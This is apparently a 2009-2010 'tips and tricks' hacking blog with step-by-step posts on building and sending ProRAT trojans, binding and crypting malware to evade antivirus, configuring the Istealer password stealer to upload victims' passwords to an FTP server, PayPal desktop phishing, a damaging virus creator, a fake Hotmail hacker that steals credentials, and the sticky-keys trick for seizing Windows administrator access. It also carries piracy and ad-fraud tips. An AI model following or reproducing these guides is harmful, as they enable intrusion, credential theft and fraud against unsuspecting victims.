TIPS AND TRICKS (19)


Rapidshare hack - Download unlimited files parallely

Many of my blog readers were asking me is there any way to download rapidshare files parallely
after a lot of research i found a method in which you can download  any number  of files parallely
Follow the given steps to download files simeltaniously



1. First download the rapidshare hack  file from Here

2. Now save the rapidshare hack  file as rapidshare hack .bat
    (note :- You can save it as anyfilename.bat )


3. Now search for rapidshare premium link generators in google or use these rapid share  
    premium  link generators  given bellow

    LIST of 4 Best Premium Link Generators:


4. Now you can download  four files parallely after you finish the download Run  rapidshare hack.bat every time before you download the next set of files by this methoid we can download any number files parallely , without any waiting time




WEDNESDAY, NOVEMBER 17, 2010

How to Hack and make money

Today i will Teach you how to make easy money 

Bux.to is a PTC site(Paid to click).You get paid to click on ads and visit websites. The process is easy! You simply click a link and view a website for 30 seconds to earn money.In this article i will show you on How to hack bux.to to browse ads.By using this trick you will be able to surf more ads and the most amazing part is that you will not get banned by doing this.


Here is a step by step procedure to hack bux.to and make money:

Step 1:
First of all signup for bux.to account
Hack bux.to









Step 2:

You will need a firefox browser for this hack.

Step3:

Install Greasemonkey Plugin then restart Firefox

Step 4:

Install Bux : Browse Ads script for Greasemonkey.

Hack bux.to










Step 5:

You are almost done just login and click on Surf Ads in your main menu.
Then the script will automatically launch and Browse Ads :

Hack bux.to









FRIDAY, JUNE 11, 2010

How to lock folder in windows 7/vista

In my last post i told u how to lock a folder in xp folder lock


Tody iam going to teach u How to Lock/Password protect a Folder in Windows XP, Vista 

We have a lot of sensitive data stored on our computer and it needs to be protected from illegal/unwanted access. There are many softwares available such as Folder Lock which are used to password protect a folder and help us to lock a folder in windows XP, Vista. Today in this article, I will inform you one of the simplest way on how to lock/password protect a folder in Windows XP or windows Vista
. I have provided link for software download
to lock a folder in windows xp and vista... just read on.

How to Password protect a folder:

Simply follow the guidelines given below to lock/password protect a folder in Windows XP, Vista.

1. Free Download

Bat File to lock/password protect afolder.


2. Now, copy "LockFolder.bat" to any desired folder where you want to store password protected files. Double click on "LockFolder.bat" and a new folder named "Locker" will be created.

3. Move all your files you want to hide in this newly created "Locker" folder.

4. Again double click on "LockFolder.bat" file and you will see a command prompt asking for confirmation. Hit "Y" to confirm that you want to lock/password protect the folder and hit enter.

How to Lock a Folder in Windows


5. The "Locker" folder will become invisible and thus, you are able to lock a folder in windows XP, Vista.

6. Now, when you want to unlock folder, again double click "LockFolder.bat" file and you will see command prompt asking for password to unlock folder. Enter "pass" (without quotes) as password and hit enter. You will again see the folder containing your private data and files.




Lock Folder in Windows Xp, Vista

That's it. So friends, I hope you are now well approached with this simple technique on how to lock/password protect a folder. If you have any problem in using this technique to password protect a folder in windows XP, Vista, please mention it in comments.

Enjoy the technique to password protect
a folder in windows XP, Vista...

SUNDAY, JANUARY 3, 2010

Rapidshare Premium hack

Happy new year to all my viewers . It is a new year a new beginning so i have decided to give my viewers a new year gift

In this post i am going to give you free rapid share premium accounts




Rapid share Premium hack

1 . download rapid share premium accounts here
2 . open pass.txt

3. you can use all the premium accounts
Enjoy downloading ,please thank me in comments


NOTE : FIRST COME FIRST SERVE


SUNDAY, DECEMBER 27, 2009

How to Create your own Crypter stubs


Hello friends. In my previous article on fud crypter one of the viewrs wanted me to do a post on stub crypter
so i did a post on stub fud

How to make Virus undetectable:

Usually, Viruses are detected because their stubs are detected as viruses by AVs. So, if you change stub of viruses, most of times, they become undetectable to antiviruses. So, I am explaining you how to create your own stub and how to use this your self-created stub to make your virus FUD (Fully UnDetecatable) to antiviruses. This Crypter is tested by me and found working well on Windows XP and Windows Vista.

STUB :

just select the antiviruses you wanna bypass. Now, create stubs and start scanning them at novirusthanks.org. This method is used to collect and group stubs undetectable by specific antiviruses. Here is one stub which is not detected by most famous AVs as today's scanner results indicate:
- Avira
- AVG
- Avast
- Bit Defender
- Kaspersky
- Quick Heal
- Panda

Free Download this Stub over here.


Develop your own stubs. Now, all resides on you to make your trojans and viruses undetectable, since you are now able to develop your own stubs.

Screenshot - Creating method stubs
The stub looks like this:

Note : to compile your stub, you should have Microsoft Visual Basic 6 installed on your computer.

So friends, I hope this tutorial on
how to make your own stubs
to make your virus trojan undetectable by antiviruses will be helpful to you. If you have any problem , please mention it in comments.

Enjoy and make your trojans undetectable...


SATURDAY, DECEMBER 19, 2009

PRORAT - hacking continued


In my previous article PRORAT - Remote PC access software, i mentioned about how to create PRORAT server for
hacking computer remotely.

Now, after server creation, you have to send server to victim and then install server on victim computer to hack computer remotely. I have explained this next part of hacking computer remotely using PRORAT here in this security article.

PRORAT server

HACKING COMPUTER REMOTELY - PRORAT:


1. Once you have created server, send this server to victim and ask him to install on his computer. If you have not read my previous article on PRORAT server creation, go back and then return here. You can bind server to say any pic or song using binder software , so that victim does not know of server installation.

2. When server is installed on victim computer, the only thing you should know is victim IP address, which you can know by various methods. I have written an article on How to Find IP Address... just read it to obtain victim IP.

3. When you know victim IP address, half part of hacking computer remotely is completed. Open Prorat on your computer and enter the victim computer IP address in text field adjacent to IP.

4. Let port remain the same. Usually this is the port opened by PRORAT server on victim computer.

5. Now hit on Connect and PRORAT will try to establish connection with server on victim computer for hacking computer remotely. Once connection with remote server is established, you can use PRORAT for hacking computer remotely.

6. You can use any of options on left option pane of PRORAT for hacking computer remotely. I will not go in details for this.

That's it. Thus, now you are able to use PRORAT for hacking computer remotely. PRORAT is used since long time to hack computer remotely and is still a working method to hack computer remotely. If you aren't able to
use PRORAT for hack computer remotely,
please mention it in comments.

Enjoy PRORAT for hacking computer remotely...






THURSDAY, DECEMBER 10, 2009

FUD CRYPTER : by pass anti virus detection


I have already written about RATs in my previous article PRORAT - Remote pc access software. I have mentioned about antiviruses detecting RATs as hacking softwares (viruses) and hence, hacker has to use Crypters to avoid antivirus detection for RATs. So, read on to know more on Crypters - hacking software for bypassing antivirus detections. I have provided link for software download.



WHAT IS CRYPTER??


As said above, Crypter is free software used to hide our viruses, RATs or any keylogger from antiviruses so that they are not detected and deleted by antiviruses. Thus, a crypter is a program that allow users to crypt the source code of their program. Generally, antivirus work by splitting source code of application and then search for certain string within source code.

If antivirus detects any certain malicious strings, it either stops scan or deletes the file as virus from system.

What does Crypter do???

Crypter simply assigns hidden values to each individual code within source code. Thus, the source code becomes hidden. Hence, our sent crypted trojan and virus bypass antivirus detection and our purpose of hacking them is fulfilled without any AV hindrance. Not only does this crypter hide source code, it will unpack the encryption once the program is executed.

What is FUD ???

FUD is acronym for Fully UnDetectable. With increased use of Crypters to bypass antiviruses, AV became more advanced and started including crypter definitions to even detect crypter strings within code. So, use of crypter to hide Ardamax keylogger and RATs became more complicated as nowadays, no publicly available crypter is FUD.

So, if you crypt RATs with publicly available crypters, they are bound to be detected by antiviruses. This is because most FUD crypters remain "FUD" for maximum of one or two days after their public release. so i am going to give you a fud crypter witch is rare to get so please thank me in comments

DOWNLOAD - FUD CRYPTER

In my next post i will explain how to use fud crypter . if you have any promblems downloading the file you are free to comment
enjoy hacking........




WEDNESDAY, DECEMBER 9, 2009

Hack administrator from Guest account.

In my last cmd post i told you how to lock a folder without any software 
today i am going to tell how to Hack administrator from Guest account.

Ever wanted to hack your college pc with guest account/student account so that you can download with full speed Hack Administrator !!!!there ? or just wanted to hack your friend’s pc to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on…


Concept:

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.

Prerequisites

Guest account with write access to system 32.

Here is how to do that -

* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
When asked to overwrite,overwrite the sethc.exe
When asked to overwrite,overwrite the sethc.exe - rdhacker.blogspot.com

* Now Log out from your guest account and at the user select window,press shift key 5 times.
* Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

Press shift key 5 times and command prompt will open - rdhacker.blogspot.com

* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
* You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account.

Further..

Also, you can further create a new user at the command prompt by typing “NET USER john/ADD” where “john” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigate to this key

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]

Here create a new DWORD value, write its name as the “user name” that u created for your admin account and live with your admin account forever :)

I hope that was informative..

MONDAY, DECEMBER 7, 2009

ISTEALER :Hack email passwords

Istealer is an efficient
windows password stealer
software used to hack email account passwords. I have already explained aboutRATs and keyloggers to hack email account passwords, where you have to send your keylogged file to victim. In the same way, Istealer can be used to hack email account password and find passwords of various emails.

ISTEALER PASSWORD STEALER - HACK EMAIL PASSWORDS:


1. Download Istealer password stealer software to hack email account password.


2. Unzip the downloaded windows password stealer using Winzix to obtain Istealer.

3. Go to http://www.esmartstart.com/ and sign up for free account. After creating free ftp server account, enable FTP Access and create a new folder named "Istealer" at your FTP.

4. Run the Loader.exe file present in Istealer folder to get something like:


Istealer windows password stealer


5. Now, simply fill the following in Istealer:
Host: ftpserver.esmartdesign.com
Username and Password: Your username and password for esmartstart ftp server.
Directory: /Istealer

6. You can bind Istealer to any other file by checking "Bind with another file" and giving file path to bind with. Also, you can use Icon Change to change Istealer file icon. This step is optional but, necessary for hiding password stealer from victim's eyes.

7. To check whether you have entered right ftp server information, hit "Test" and if you have done it right, you will get message "Works perfect". If it says "Cannot connect to FTP Server", you have entered something wrong... just check it again.

8. When you've done all above steps, simply hit on "Build" and save the password stealer file as you want. You can also use binder to avoid antivirus detection.

9. Now, simply send this password stealer file to victim and make him run this windows password stealer file on his computer(Social Engineering). After he runs our sent password stealer file on his computer, you will get all passwords and records saved on his computer at your FTP server.

That's it. Thus, you can hack email account password using Istealer- the windows password stealer software. Remember to crypt and then bind this windows Password stealer to make it undetectable by antivirus. If you have any problem in using this
Istealer password stealer software
to hack email account password, please mention it in comments.

Enjoy Istealer to hack email account password...

SUNDAY, DECEMBER 6, 2009

DESKTOP PHISHING


In my previous article, I mentioned about Hotmail Hacking by using hotmail hacker, today i am going to tell you how to hack account password using desktop phishing . Desktop phishing is advanced method to hack any account password using Phishing. I will be mentioning this Desktop Phishing in this article. To know what is phishing read my previous articles

Desktop Phishing hack Paypal password
Note: Desktop Phishing to hack Paypal account password is illegal. I am not responsible for any action done by you. Hack Paypal account password at your own risk.


What is Desktop Phishing???

Desktop Phishing is one more method of Phishing useful to hack email account passwords. Not only email passwords, but you can hack any account password of site you want. In simple Phishing I mentioned in Phishing: Hack email account, hacker has to send phisher to victim to his inbox and you have to wait for victim to login with out sent Phisher.

But, in Desktop Phishing, you only have to send the Phisher Arm (If it's phisher in phishing, we call it phisher arm in Desktop Phishing). You have to run server on your computer and save fake page of the website you wanna hack password, in directory of this server.

Now, when you have sent Phisher Arm(I will explain how to make one), ask the victim to install the Phisher Arm(Social Engineering). After installation, whenever victim tries to visit Paypal.com, his browser will show him our Paypal Phisher fake page. When he tries to login to his Paypal account using our Paypal Phisher, his paypal id and password will be recorded in server directory on your computer... thus you can hack Paypal account password.

That's it. Our goal to
hack Paypal account password
achieved using Desktop Phishing. In my next article (Update: I have written indepth tutorial on desktop phishing in my article Desktop phishing - continued), I will write step-by-step procedure to hack Paypal account password using Desktop Phishing. One can hack any email account password using Desktop Phishing. I have just taken example of Paypal.com. If you have any problem in using Desktop Phishing to hack Paypal account password, just mention it in comments.

FRIDAY, NOVEMBER 27, 2009

PRORAT : Remote PC Access Software


In my last articlas about hard ware key loggers and adramx key logger , i am posting this security article to inform about installation and use of PRORAT. PRORAT is a RAT (Remote Administration Tool)used as
remote pc access software.

remote pc access software.
PRORAT hacking software


PRORAT - Remote pc access software:

1. Download PRORAT software for remote pc access.


2. Unzip downloaded file using Winzix to use this remote pc access software

3. Now, the unzipped file will contain Prorat.exe file. Run the file on your computer.

4. Now, we have to create a server to send it to remote computer for remote pc access. So, click on Create ->Create Prorat server.

5. Go to no-ip.com and register for an account.


Remote pc access software PRORAT
6. Now, in Pro connective notification, enter in IP(DNS) address, the link provided to you by no-ip and let all remaining fields remain unchecked.

7. Alongwith using Pro connective notification, you can even use your mail address to confirm about server installation.

8. You can even bind the server with a specific file to prevent victim knowing about the server installation on his computer.

9. To change server default icon, click on "Server icon" on left option pane and select any suitable icon according to binded file.

10. Now, when all things are done, hit on "Create server" and you will get server created in Prorat directory. This server is used for remote pc access.

11. This ends server creation part over here. Just refer Remote pc access tutorial for more information.... the best PRORAT tutorial i found.

You will require to have Winzix to get PRORAT - remote pc access software. Download Winzix here.


Now, when you have created PRORAT server, next step is to send this server to victim computer and then use PRORAT for remote pc access. You can use Binder to avoid our server trojan from being detected by antivirus. I will explain in my next article about how to connect to remote PRORAT server on remote victim computer and then use this for remote pc access. If you have any problem in using this
PRORAT for remote pc access,
please mention it in comments section.

[update : you can use fud crypter to by pass antivirus detection]

Enjoy remote pc access software...

MONDAY, NOVEMBER 23, 2009

Virus creator to create torjan virus


This virus creator software is easy to use and is used to create virus trojan which harasses user. In this article, I have explained how to create torjan virus

VIRUS CREATOR TO CREATE VIRUS TROJAN:


1. Download VIRUS CREATOR S
oftware to create virus trojan.


2. Unzip the file using Winzix ( download here) to obtain Virus creator to
create virus






3. Run Virus Creator V.65 on your computer to get something like:
Atomic virus creator

4. Now, Virus creator will ask you for various options listed below:

name of virus
# Save virus to startup
# Save to homedrive
# Save to system32
# Save to desktop
# Disable scheduled tasks
# Create 10 users
# Corrupt system files
# Open 10 command windows
# Start world's most annoying webpages 10 times
# Reset time to midnight
# Memory leak

These options determine effectiveness of your virus. You can choose options preferences as you like and depending on amount of damage you wish the virus should do to victim.

Now, when you have selected preferences, simply press enter and virus creator software will create virus trojan for you.

5. Now, all you have to do is send this created virus to your victim and ask him to run this virus on his computer(Social Engineering). You can use Binder to make this virus undetectable from antivirus and even prevent doubt of victim. 

You will require to have Winzix to download Virus creator software. Free Download Winzix here. Remember to install.
Thus, you now know how to create virus trojan using Virus creator software. Remember to bind this virus with Binder. I have tried to keep this virus creator tutorial simple. If you have any problem in usingvirus creator to create virus,please mention it in comments.

Enjoy Virus creator software to create virus...


SUNDAY, NOVEMBER 22, 2009

Binder software to disable Antivirus detection



What is Binder???

Binder is a free software used to bind or combine two or more files in one file under one name and extension. The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file. If binded file contains an application (in our case - RAT or keylogger), the application is also run when the actual binded file is run.
thus Binder is used to bypass antivirus detection.
I have provided link to download binder.



HOW TO USE BINDER???


1. first of all, you need a binder. So, download freeBinder software.


2. Unzip the downloaded file using Winzix (free download here) to obtain Binder setup.

3. Install software on your computer to see:
Binder software to disable antivirus

4. Now, click on "Select File #1" and select thekelloger or RAT you wanna bind to avoid its antivirus detection.

5. Click on "Select File #2" and select the normal file with which you wanna bind our trojan, RAT or Kelogger.

6. Simply, hit on "Bind" to obtain the binded keylogger or trojan file. Now, simply send this file to victim whom this file will appear normal (trojan is hidden due to binding).

7. Remember to check both "Execute"options and you can use "EXE Pump" to increase your file size to desired value.

please post comments



SATURDAY, NOVEMBER 21, 2009

Use Mobile Phone as a Microphone and Speakers






No one like to use their microphone and speakers when they talk to their family and friend in Yahoo messenger, Msn Messenger, Skype, Google Talks and so many instant messenger software. Now you can make use of you mobile as microphone and speakers to talk with you friends and family believe me it's simple and easy, just follow the step by step guide and you will throw you microphone into bin forever.

You don't have to remain in one place to talk with friends an family, if you have USB bluetooth or WIFI router you can remain anywhere in your home and enjoy talking with your friends and save your cost forever.

Here is the step by step guide to make your mobile phone as microphone.

1. Download the file from This link and read the following steps.
2. In this file you will get one folder (I_LOVE_DVT) and two separate file. One is for PC application and another is for mobile application.
3. Install the PC software name as "mobiolaheadset2_wl_s60v3" in PC and install the mobile application name as "headset_s60_v_2_0" into mobile.
4. Remember if your don't have Blue tooth or WIFI functions, it will not work. Yeah it works for Cable but what is the difference between a cable and normal Microphone.
5. Installed the application in PC as well in mobile now open the folder "I_LOVE_DVT" and in it you will find two files, one is "keymaker" and other is "runme". Copy these two files into the install directory such as "C:\Program Files\Mobiola Headset for S60" and paste it.
6. Now run the "runme" and "keymaker" as well. From "runme" copy the Hardware fingerprint something like "373D-BCC0" into "keymaker's" H/W ID and press generate.
7. Now copy the keys and the name from "keymaker" into "runme" and press ok. It show valid. Now run the PC application and check it.
8. Than go to control Panel, sound and device. Run the sound and devices settings find the microphones one, select your microphone driver to mobiola and select the speaker driver.
9. Check your microphone by going to Volume controls and run any song to check your speakers that you can hear the song in your mobile speaker.
10. Enjoy talking with your friends and family and save your cost.

FRIDAY, NOVEMBER 13, 2009

FOLDER LOCK -NO SOFTWARE

Want to hide your ‘really’ private data ? but reluctant to use professional SOFTWARE
Create a simple folder lock without using any software

Here is how to do that -
Create a new folder,rename it to a simple name like xero.
Now go to its properties,and choose a sprite less icon,which is next to a Yellow lock icon in third row.
choose a sprite less iconChoose it,click OK and now folder will have no icon,literally invisible.Now to make it almost inaccessible,we must use some Batch renaming technique.
Create a new text file in the same drive next to the folder and type thiscommand statement into it-
ren xero xero.{b5946137-7b9f-4925-af80-51abd60b20d5}
type this command statement exactly
Now save this text file as lock.bat. Similarly create another text file and type this command statement into it-
ren xero.{b5946137-7b9f-4925-af80-51abd60b20d5} xero
type this command statement exactly
Save this text file as lock.bat . Lock.bat will be used to make the folder inaccessible and Key.bat will be used to revert it into its original form.
What we have done here,is that we have renamed the folder with a random CLSID,which will change its identity into something else sing DOS. ‘CLSID’ is a unique registry-identifying component that is used to identify anActiveX control or in simple language,it identifies which file/control will be opened by which program in Windows. I have determined the CLSID by opening registry editor and searching for “CLSID” and choosing any random value like {b5946137-7b9f-4925-af80-51abd60b20d5}which I m using here.
Some common CLSID’s are -
  • Recycle bin - 645FF040-5081-101B-9F08-00AA002F954E
  • Control panel - 21EC2020-3AEA-1069-A2DD-08002B30309D
  • Run - 2559A1F3-21D7-11D4-BDAF-00C04F60B9F0
  • Search - 2559A1F0-21D7-11D4-BDAF-00C04F60B9F0
  • Connect To - 7007ACC7-3202-11D1-AAD2-00805FC1270E
  • Briefcase - 85BBD920-42A0-1069-A2E4-08002B30309D
  • Help - 2559A1F1-21D7-11D4-BDAF-00C04F60B9F0
  • Fonts - D20EA4E1-3957-11d2-A40B-0C5020524152
  • Cameras and Scanners - E211B736-43FD-11D1-9EFB-0000F8757FCD
  • My Network places - 208D2C60-3AEA-1069-A2D7-08002B30309D
Sorry for a little diversion,but I thought that was necessary. Now you have created the files,just double click the lock.bat file to make the folder inaccessible. Now the folder is invisible and also it cant be accessed by anyone.
But still,it has a name. So,in order to completely hide it, Rename it and enter an ASCII code by pressing ALT+0160 which will enter a null character in place of name and it will have No Name.
Now we have a completely hidden and inaccessible folder.

Congrats..Now you have created an inaccessible folder. To access it,just rename the folder into its original name and then click on key.bat . Now make sure to place the folder in a secure location and place lock.bat and key.bat in different locations . This simple folder lock is very effective as no one has idea that You can create it (sarcasm..again :P) .
Use some creativity and you can make that folder 100% inaccessible by encrypting it. I gave you a hint,find your own way :)

Hotmail Hacker - Hack Hotmail

I was just wandering around web and came across software to hack Hotmail password. This Hotmail Hacker is 100% working way to hack Hotmail password




HOTMAIL HACKER - HACK HOTMAIL PASSWORD:


1. 
Free Download Hotmail hacker to hack hotmail password.


2. Download
 Winzix (free download here) to obtain Hotmail hacker folder.

3. Run, Hotmail hacker builder.exe file to see:




4. Now, enter your email account address, password and also the subject of email you want to receive. This email will contain the password you wanna hack. Also select appropriate smtpserveraddress. You can use smtp server addressesfor this. Avoid use of hotmail email account. Can use gmail, yahoo or such. Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.

5. Now, send this Hotmail Hacker.exe file to victim whose you wanna hack Hotmail password and tell him that this Hotmail hacker software is used to hack Hotmail password. Convince him that he can hack anyone's hotmail password using this Hotmail hacker. Ask him to run Hotmail Hacker.exe and enter all information (which includes his Hotmail id and password plus Hotmail id of victim he wanna hack).
6. As he enters this information and hits "Login And Start", he will receive error message as shown.

7. And you will receive in your inbox a mail like this:

8. Cheers.... you are able to hack Hotmail password using Hotmail hacker - hotmail cracker software.

You will require to have Winzix to get Hotmail Hacker software. Download Winzix here.
That's it for today. I hope you are now well approached with this way tohack Hotmail password using Hotmail hacker.This way to hack hotmail password using hotmail hacker is 100% working.. personally tested. If you face problems in using Hotmail hacker to hack hotmail password, mention it in comments.
Enjoy Hotmail hacker to hack hotmail password...